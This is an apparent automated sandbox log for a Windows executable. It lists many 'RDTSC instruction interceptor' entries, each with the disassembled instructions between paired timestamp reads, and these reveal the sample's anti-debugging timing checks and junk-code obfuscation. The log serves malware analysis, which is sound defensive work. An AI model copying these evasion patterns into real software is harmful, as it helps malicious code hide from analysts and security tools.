Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17400D6 second address: 17400DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17400DA second address: 17400E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17400E6 second address: 17400EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17400EC second address: 174011A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDBh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FB6E8B0AEF7h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB6E8B0AEE3h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 174011A second address: 174011E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173FDD8 second address: 173FDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 173FDDC second address: 173FDFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FB6E8B0C7F2h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17840A3 second address: 17840A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17840A7 second address: 17840AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1783F0B second address: 1783F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jno 00007FB6E8B0AED6h 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1783F1C second address: 1783F35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EDh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FB6E8B0C7E6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 177B582 second address: 177B588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 177B588 second address: 177B5A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007FB6E8B0C7E6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 177B5A3 second address: 177B5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 179186B second address: 1791871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1791871 second address: 1791875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1791875 second address: 179187B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FB71 second address: 185FB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007FB6E8B0AEDCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FB82 second address: 185FBCD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB6E8B0C7E6h 0x00000009 jmp 00007FB6E8B0C7F2h 0x0000000e jmp 00007FB6E8B0C7EDh 0x00000013 ja 00007FB6E8B0C7E6h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e js 00007FB6E8B0C7F4h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 jmp 00007FB6E8B0C7ECh 0x0000002b push edi 0x0000002c pushad 0x0000002d popad 0x0000002e pop edi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FED1 second address: 185FEE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB6E8B0AEDFh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FEE8 second address: 185FF29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 jmp 00007FB6E8B0C7F5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB6E8B0C7EAh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 185FF29 second address: 185FF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 186062E second address: 1860641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB6E8B0C7ECh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 186079C second address: 18607A6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864BDE second address: 1864BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864BE5 second address: 1864BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864C97 second address: 1864CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB6E8B0C7E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864E46 second address: 1864E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FB6E8B0AED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864E50 second address: 1864E54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1864EF6 second address: 1864F29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB6E8B0AEE9h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 186519F second address: 18651A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe RDTSC instruction interceptor: paired rdtsc instruction traces (first address, second address, intervening instructions)
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41429 second address: 6F4145A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c pushad 0x0000000d jmp 00007FB6E8B0AEDCh 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 mov eax, dword ptr [esi+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4145A second address: 6F41473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7F4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41473 second address: 6F41478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41478 second address: 6F414B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007FB6E8B0C7F9h 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 pushad 0x00000015 mov ebx, ecx 0x00000017 mov cx, DF4Fh 0x0000001b popad 0x0000001c mov dword ptr [edx+0Ch], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov edi, 5E91BB12h 0x00000027 mov cx, bx 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F414B7 second address: 6F414F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, al 0x00000005 mov ebx, 5B3B0CC2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+10h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FB6E8B0AEE2h 0x00000019 jmp 00007FB6E8B0AEE5h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F414F5 second address: 6F414FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F414FA second address: 6F41500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41500 second address: 6F41504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41504 second address: 6F41535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB6E8B0AEDDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41535 second address: 6F4153B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4153B second address: 6F4153F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4153F second address: 6F41563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FB6E8B0C7F0h 0x00000013 pop eax 0x00000014 mov dx, 58B6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41563 second address: 6F4158F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+14h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB6E8B0AEE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4158F second address: 6F41595 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41595 second address: 6F41599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41599 second address: 6F4159D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4159D second address: 6F415C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FB6E8B0AEE6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F415C4 second address: 6F41614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0C7F1h 0x00000009 or eax, 5FCC1CD6h 0x0000000f jmp 00007FB6E8B0C7F1h 0x00000014 popfd 0x00000015 mov edi, esi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+18h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FB6E8B0C7F9h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F41614 second address: 6F4161A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4161A second address: 6F416A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB6E8B0C7F5h 0x00000012 adc ecx, 1C2F0A46h 0x00000018 jmp 00007FB6E8B0C7F1h 0x0000001d popfd 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FB6E8B0C7EEh 0x00000025 sub esi, 26306EE8h 0x0000002b jmp 00007FB6E8B0C7EBh 0x00000030 popfd 0x00000031 mov ecx, 20DC36DFh 0x00000036 popad 0x00000037 popad 0x00000038 mov dword ptr [edx+1Ch], eax 0x0000003b pushad 0x0000003c mov bl, ch 0x0000003e mov ecx, ebx 0x00000040 popad 0x00000041 mov eax, dword ptr [esi+20h] 0x00000044 jmp 00007FB6E8B0C7EFh 0x00000049 mov dword ptr [edx+20h], eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416A1 second address: 6F416A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416A5 second address: 6F416AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416AB second address: 6F416B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416B1 second address: 6F416B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F416B5 second address: 6F4174D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+24h] 0x0000000b jmp 00007FB6E8B0AEE0h 0x00000010 mov dword ptr [edx+24h], eax 0x00000013 pushad 0x00000014 mov cx, 586Dh 0x00000018 jmp 00007FB6E8B0AEDAh 0x0000001d popad 0x0000001e mov eax, dword ptr [esi+28h] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FB6E8B0AEDEh 0x00000028 and si, B138h 0x0000002d jmp 00007FB6E8B0AEDBh 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007FB6E8B0AEE8h 0x00000039 adc ecx, 2D272B98h 0x0000003f jmp 00007FB6E8B0AEDBh 0x00000044 popfd 0x00000045 popad 0x00000046 mov dword ptr [edx+28h], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FB6E8B0AEE5h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4174D second address: 6F4175D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0C7ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F4175D second address: 6F417BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b pushad 0x0000000c mov bl, 79h 0x0000000e call 00007FB6E8B0AEE6h 0x00000013 jmp 00007FB6E8B0AEE2h 0x00000018 pop esi 0x00000019 popad 0x0000001a mov dword ptr [edx+2Ch], ecx 0x0000001d jmp 00007FB6E8B0AEE1h 0x00000022 mov ax, word ptr [esi+30h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FB6E8B0AEDDh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F417BC second address: 6F4187C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d jmp 00007FB6E8B0C7EEh 0x00000012 mov ax, word ptr [esi+32h] 0x00000016 pushad 0x00000017 call 00007FB6E8B0C7EEh 0x0000001c movzx ecx, bx 0x0000001f pop edi 0x00000020 mov si, 4C43h 0x00000024 popad 0x00000025 mov word ptr [edx+32h], ax 0x00000029 jmp 00007FB6E8B0C7F6h 0x0000002e mov eax, dword ptr [esi+34h] 0x00000031 jmp 00007FB6E8B0C7F0h 0x00000036 mov dword ptr [edx+34h], eax 0x00000039 pushad 0x0000003a mov cx, 184Dh 0x0000003e pushfd 0x0000003f jmp 00007FB6E8B0C7EAh 0x00000044 adc eax, 184AAB68h 0x0000004a jmp 00007FB6E8B0C7EBh 0x0000004f popfd 0x00000050 popad 0x00000051 test ecx, 00000700h 0x00000057 jmp 00007FB6E8B0C7F6h 0x0000005c jne 00007FB757E0A68Fh 0x00000062 pushad 0x00000063 mov al, 4Fh 0x00000065 push eax 0x00000066 push edx 0x00000067 mov ax, di 0x0000006a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90CB3 second address: 6F90CB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90CB7 second address: 6F90CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90CBD second address: 6F90D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6E8B0AEDCh 0x00000009 xor al, FFFFFF98h 0x0000000c jmp 00007FB6E8B0AEDBh 0x00000011 popfd 0x00000012 mov dx, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a call 00007FB6E8B0AEDBh 0x0000001f pushad 0x00000020 popad 0x00000021 pop eax 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FB6E8B0AEDEh 0x0000002b adc cx, FB28h 0x00000030 jmp 00007FB6E8B0AEDBh 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007FB6E8B0AEE8h 0x0000003c add si, 2D88h 0x00000041 jmp 00007FB6E8B0AEDBh 0x00000046 popfd 0x00000047 popad 0x00000048 mov ebp, esp 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FB6E8B0AEE5h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90D59 second address: 6F90D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90D5F second address: 6F90D63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F90D63 second address: 6F90D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30799 second address: 6F3081E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov eax, 268590D3h 0x00000010 pushfd 0x00000011 jmp 00007FB6E8B0AEE8h 0x00000016 xor al, 00000058h 0x00000019 jmp 00007FB6E8B0AEDBh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FB6E8B0AEDFh 0x00000028 and ch, 0000001Eh 0x0000002b jmp 00007FB6E8B0AEE9h 0x00000030 popfd 0x00000031 pushad 0x00000032 mov cx, E33Dh 0x00000036 movzx esi, bx 0x00000039 popad 0x0000003a popad 0x0000003b xchg eax, ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F3081E second address: 6F30822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30822 second address: 6F30828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6F30828 second address: 6F30851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ecx, 009BC053h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0030 second address: 6ED0036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0036 second address: 6ED003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0724 second address: 6ED0732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6E8B0AEDAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0732 second address: 6ED0742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0742 second address: 6ED0747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 6ED0747 second address: 6ED078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0C7F0h 0x00000008 pushfd 0x00000009 jmp 00007FB6E8B0C7F2h 0x0000000e sbb al, 00000028h 0x00000011 jmp 00007FB6E8B0C7EBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c mov edx, eax 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov bh, C3h 0x00000026 rdtsc
